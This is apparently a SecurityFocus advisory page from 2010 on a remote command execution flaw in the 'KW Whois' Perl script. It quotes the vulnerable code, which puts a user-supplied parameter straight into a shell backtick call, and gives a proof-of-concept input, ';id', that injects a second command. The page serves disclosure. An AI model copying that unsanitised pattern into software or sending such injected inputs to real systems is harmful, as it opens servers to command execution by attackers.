info
discussion
exploit
solution
references
KW Whois Remote Command Execution Vulnerability
Unsafe code:
$site = $query->param('whois');
....
$app = `whois $site`;
print "$app .......
Proof of concept:
Type ";id" (without the quotes) into the input box.
Privacy Statement
Copyright 2010, SecurityFocus
